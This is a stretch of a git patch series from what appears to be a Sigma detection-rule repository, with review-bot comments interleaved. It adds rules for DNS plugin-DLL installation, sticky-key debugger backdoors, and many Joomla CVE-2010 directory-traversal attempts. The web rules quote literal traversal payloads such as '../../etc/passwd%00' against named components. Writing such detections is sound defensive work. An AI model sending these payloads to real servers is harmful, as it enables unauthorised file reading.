diff --git a/rules/windows/registry_event/registry_event_dns_serverlevelplugindll.yml b/rules/windows/registry_event/registry_event_dns_serverlevelplugindll.yml
new file mode 100755
index 00000000..fc25febc
--- /dev/null
+++ b/rules/windows/registry_event/registry_event_dns_serverlevelplugindll.yml
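Review bot: The new `condition: dnsadmin` in the second hunk names a selection whose definition sits above the hunk's first line and is not visible here; confirm the selection under `detection:` is really called `dnsadmin`, because replacing `1 of them` with a named selection silently breaks the rule if the names differ. The same check applies to `condition: selection_registry` in the sticky-key registry hunk at L1373, whose selection is likewise defined outside the hunk. Both enclosing `detection` blocks start outside their hunks.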
@@ -0,0 +1,32 @@
+title: DNS ServerLevelPluginDll Install
+id: e61e8a88-59a9-451c-874e-70fcc9740d67
+status: experimental
+description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server
+ (restart required)
+references:
+ - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
+date: 2017/05/08
+modified: 2021/09/12
+author: Florian Roth
+tags:
+ - attack.defense_evasion
+ - attack.t1073 # an old one
+ - attack.t1574.002
+ - attack.t1112
+logsource:
+ product: windows
+ category: registry_event
+detection:
+ dnsregmod:
+ TargetObject|endswith: '\services\DNS\Parameters\ServerLevelPluginDll'
+ condition: dnsregmod
+falsepositives:
+ - unknown
+level: high
+fields:
+ - EventID
+ - CommandLine
+ - ParentCommandLine
+ - Image
+ - User
+ - TargetObject
\ No newline at end of file
From 437ea3408be84e0992e37cbeef1a063d47da06d9 Mon Sep 17 00:00:00 2001
From: frack113
Date: Sun, 12 Sep 2021 09:58:43 +0200
Subject: [PATCH 0884/1367] split sysmon_stickykey_like_backdoor.yml
---
...ocess_creation_stickykey_like_backdoor.yml | 37 +++++++++++++++++++
...egistry_event_stickykey_like_backdoor.yml} | 31 +++------------
2 files changed, 43 insertions(+), 25 deletions(-)
create mode 100644 rules/windows/process_creation/process_creation_stickykey_like_backdoor.yml
rename rules/windows/registry_event/{sysmon_stickykey_like_backdoor.yml => registry_event_stickykey_like_backdoor.yml} (73%)
diff --git a/rules/windows/process_creation/process_creation_stickykey_like_backdoor.yml b/rules/windows/process_creation/process_creation_stickykey_like_backdoor.yml
new file mode 100644
index 00000000..6e9c71ef
--- /dev/null
+++ b/rules/windows/process_creation/process_creation_stickykey_like_backdoor.yml
@@ -0,0 +1,37 @@
+title: Sticky Key Like Backdoor Usage
+id: 2fdefcb3-dbda-401e-ae23-f0db027628bc
+related:
+ - id: baca5663-583c-45f9-b5dc-ea96a22ce542
+ type: derived
+description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login
+ screen
+references:
+ - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/
+tags:
+ - attack.privilege_escalation
+ - attack.persistence
+ - attack.t1015 # an old one
+ - attack.t1546.008
+ - car.2014-11-003
+ - car.2014-11-008
+author: Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community
+date: 2018/03/15
+modified: 2021/09/12
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_process:
+ ParentImage|endswith: '\winlogon.exe'
+ Image|endswith: '\cmd.exe'
+ CommandLine|contains:
+ - 'sethc.exe'
+ - 'utilman.exe'
+ - 'osk.exe'
+ - 'Magnify.exe'
+ - 'Narrator.exe'
+ - 'DisplaySwitch.exe'
+ condition: selection_process
+falsepositives:
+ - Unlikely
+level: critical
\ No newline at end of file
diff --git a/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml b/rules/windows/registry_event/registry_event_stickykey_like_backdoor.yml
similarity index 73%
rename from rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml
rename to rules/windows/registry_event/registry_event_stickykey_like_backdoor.yml
index eeaeb2cf..2ec90b7c 100755
--- a/rules/windows/registry_event/sysmon_stickykey_like_backdoor.yml
+++ b/rules/windows/registry_event/registry_event_stickykey_like_backdoor.yml
@@ -1,5 +1,5 @@
-action: global
 title: Sticky Key Like Backdoor Usage
+id: baca5663-583c-45f9-b5dc-ea96a22ce542
 description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login
 screen
 references:
@@ -13,12 +13,7 @@ tags:
 - car.2014-11-008
 author: Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community
 date: 2018/03/15
-modified: 2020/11/28
-falsepositives:
- - Unlikely
-level: critical
----
-id: baca5663-583c-45f9-b5dc-ea96a22ce542
+modified: 2021/09/12
 logsource:
 category: registry_event
 product: windows
@@ -31,21 +26,7 @@ detection:
 - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger'
 - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe\Debugger'
 - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger'
- condition: 1 of them
----
-id: 2fdefcb3-dbda-401e-ae23-f0db027628bc
-logsource:
- category: process_creation
- product: windows
-detection:
- selection_process:
- ParentImage|endswith: '\winlogon.exe'
- Image|endswith: '\cmd.exe'
- CommandLine|contains:
- - 'sethc.exe'
- - 'utilman.exe'
- - 'osk.exe'
- - 'Magnify.exe'
- - 'Narrator.exe'
- - 'DisplaySwitch.exe'
- condition: 1 of them
+ condition: selection_registry
+falsepositives:
+ - Unlikely
+level: critical
\ No newline at end of file
From 014ac2d24e5adcaf9cb94b613118399988ca58e1 Mon Sep 17 00:00:00 2001
From: pbssubhash Date: Sun, 12 Sep 2021 18:09:14 +0530 Subject: [PATCH 0885/1367] Modifying Rules --- ...eb_cve-2010-0943_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-0944_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-0985_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1219_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1304_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1305_exploitation_attempt.yaml | 25 +++++++++++++++++ ...eb_cve-2010-1306_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1307_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1308_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1312_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1313_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1314_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1345_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1353_exploitation_attempt.yaml | 23 ++++++++++++++++ ...eb_cve-2010-1354_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1470_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1471_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1472_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1473_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1474_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1475_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1476_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1494_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1495_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1532_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1533_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1534_exploitation_attempt.yaml | 24 +++++++++++++++++ 
...eb_cve-2010-1535_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1601_exploitation_attempt.yaml | 23 ++++++++++++++++ ...eb_cve-2010-1602_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1607_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1657_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1659_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1714_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1717_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1718_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1719_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1722_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1875_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1953_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1954_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1955_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1956_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1979_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1980_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1981_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-1983_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2033_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2034_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2035_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2036_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2122_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2259_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2307_exploitation_attempt.yaml | 25 +++++++++++++++++ ...eb_cve-2010-2682_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-2861_exploitation_attempt.yaml | 25 +++++++++++++++++ 
...eb_cve-2010-2920_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-3426_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-4231_exploitation_attempt.yaml | 23 ++++++++++++++++ ...eb_cve-2010-4617_exploitation_attempt.yaml | 24 +++++++++++++++++ ...eb_cve-2010-5278_exploitation_attempt.yaml | 24 +++++++++++++++++ ...ve_CVE-2010-0943_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-0944_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1306_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1314_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1345_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1353_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1474_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-1475_exploitation_attempt.yaml | 24 ----------------- ...ve_CVE-2010-1495_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1532_exploitation_attempt.yaml | 24 ----------------- ...ve_CVE-2010-1533_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1535_exploitation_attempt.yaml | 24 ----------------- ...ve_CVE-2010-1602_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-1657_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1718_exploitation_attempt.yaml | 24 ----------------- ...ve_CVE-2010-1722_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1875_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-1953_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1954_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-1955_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1979_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-1983_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-2033_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-2036_exploitation_attempt.yaml | 26 ------------------ 
...ve_CVE-2010-2259_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-2307_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-2682_exploitation_attempt.yaml | 26 ------------------ ...ve_CVE-2010-2861_exploitation_attempt.yaml | 27 ------------------- ...ve_CVE-2010-3426_exploitation_attempt.yaml | 23 ---------------- ...ve_CVE-2010-4231_exploitation_attempt.yaml | 25 ----------------- ...ve_CVE-2010-4617_exploitation_attempt.yaml | 25 ----------------- 92 files changed, 1464 insertions(+), 768 deletions(-) create mode 100644 rules/web/web_cve-2010-0943_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-0944_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-0985_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1219_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1304_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1305_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1306_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1307_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1308_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1312_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1313_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1314_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1345_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1353_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1354_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1470_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1471_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1472_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1473_exploitation_attempt.yaml create mode 100644 
rules/web/web_cve-2010-1474_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1475_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1476_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1494_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1495_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1532_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1533_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1534_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1535_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1601_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1602_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1607_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1657_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1659_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1714_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1717_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1718_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1719_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1722_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1875_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1953_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1954_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1955_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1956_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1979_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1980_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-1981_exploitation_attempt.yaml create mode 100644 
rules/web/web_cve-2010-1983_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2033_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2034_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2035_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2036_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2122_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2259_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2307_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2682_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2861_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-2920_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-3426_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-4231_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-4617_exploitation_attempt.yaml create mode 100644 rules/web/web_cve-2010-5278_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml 
delete mode 100644 rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
delete mode 100644 rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve-2010-0943_exploitation_attempt.yaml
new file mode 100644
index 00000000..52d23982
--- /dev/null
+++ b/rules/web/web_cve-2010-0943_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-0943 exploitation attempt
+id: 7341b3ab-aed8-470b-b3b3-baee54357b21
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component com_jashowcase - Directory Traversal:Directory traversal
+ vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ in a jashowcase action to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve-2010-0944_exploitation_attempt.yaml
new file mode 100644
index 00000000..3bcd121b
--- /dev/null
+++ b/rules/web/web_cve-2010-0944_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-0944 exploitation attempt
+id: 99eb6dd1-7eef-4210-862c-a4289b0eb3c1
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component com_jcollection - Directory Traversal:Directory traversal
+ vulnerability in the JCollection (com_jcollection) component for Joomla! allows
+ remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
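Review bot: This new web rule uses `false_positives:` where the Sigma schema and the other rules in this patch series (`falsepositives:` in the registry rules above) use `falsepositives:`, and it has no `logsource:` section at all, so a backend has nothing to map `c-uri` against; add `logsource:` with `  category: webserver` and rename the key to `falsepositives:`. The detection also pins one exact traversal depth plus the trailing `%00`, so an attempt with a different number of `../` segments or without the null byte is missed — matching on `option=com_jashowcase` together with `controller=../` would cover those variants while keeping the stated FP profile. The same three points apply to every web rule hunk in this patch, including those at L1382–L1388.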
diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yaml b/rules/web/web_cve-2010-0985_exploitation_attempt.yaml
new file mode 100644
index 00000000..13e1971a
--- /dev/null
+++ b/rules/web/web_cve-2010-0985_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-0985 exploitation attempt
+id: 299f62c1-9e8a-43cc-b018-98d469f5654b
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component com_abbrev - Local File Inclusion:Directory traversal
+ vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla!
+ allows remote attackers to include and execute arbitrary local files via a .. (dot
+ dot) in the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yaml b/rules/web/web_cve-2010-1219_exploitation_attempt.yaml
new file mode 100644
index 00000000..741d57a3
--- /dev/null
+++ b/rules/web/web_cve-2010-1219_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1219 exploitation attempt
+id: c72b9df0-2e24-4c59-a18d-2ce9f309011c
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component com_janews - Local File Inclusion:Directory traversal
+ vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote
+ attackers to read arbitrary local files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yaml b/rules/web/web_cve-2010-1304_exploitation_attempt.yaml
new file mode 100644
index 00000000..62c8e768
--- /dev/null
+++ b/rules/web/web_cve-2010-1304_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1304 exploitation attempt
+id: d43a3260-6661-4963-ae51-1516b410eab4
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component User Status - Local File Inclusion:Directory traversal
+ vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16
+ for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in
+ the controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yaml b/rules/web/web_cve-2010-1305_exploitation_attempt.yaml
new file mode 100644
index 00000000..ac18cb0a
--- /dev/null
+++ b/rules/web/web_cve-2010-1305_exploitation_attempt.yaml
@@ -0,0 +1,25 @@
+title: CVE-2010-1305 exploitation attempt
+id: 4ad4e3e9-c2ec-4f11-ae69-686317089de1
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component JInventory 1.23.02 - Local File Inclusion:Directory
+ traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component
+ 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows
+ remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve-2010-1306_exploitation_attempt.yaml
new file mode 100644
index 00000000..8efdc7f9
--- /dev/null
+++ b/rules/web/web_cve-2010-1306_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1306 exploitation attempt
+id: 6eef2e17-dda2-4c9d-8e1f-9f28d02cbb68
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Picasa 2.0 - Local File Inclusion:Directory traversal
+ vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla!
+ allows remote attackers to read arbitrary local files via a .. (dot dot) in the
+ controller parameter to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yaml b/rules/web/web_cve-2010-1307_exploitation_attempt.yaml
new file mode 100644
index 00000000..15558f07
--- /dev/null
+++ b/rules/web/web_cve-2010-1307_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1307 exploitation attempt
+id: 57eb5063-d907-440a-8194-6a304a2c33dc
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component Magic Updater - Local File Inclusion:Directory traversal
+ vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows
+ remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yaml b/rules/web/web_cve-2010-1308_exploitation_attempt.yaml
new file mode 100644
index 00000000..bf0e78b5
--- /dev/null
+++ b/rules/web/web_cve-2010-1308_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1308 exploitation attempt
+id: 2ab1d26f-292d-48ef-b821-30000ca2d796
+author: Subhash Popuri (@pbssubhash)
+date: 2021/08/25
+status: experimental
+description: Joomla! Component SVMap 1.1.1 - Local File Inclusion:Directory traversal
+ vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote
+ attackers to read arbitrary files via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+ - https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+ - Scanning from Nuclei
+ - Penetration Testing Activity
+ - Unknown
+tags:
+ - attack.initial_access
+ - attack.t1190
+level: critical
diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yaml b/rules/web/web_cve-2010-1312_exploitation_attempt.yaml
new file mode 100644
index 00000000..8dff6589
--- /dev/null
+++ b/rules/web/web_cve-2010-1312_exploitation_attempt.yaml
@@ -0,0 +1,24 @@
+title: CVE-2010-1312 exploitation attempt
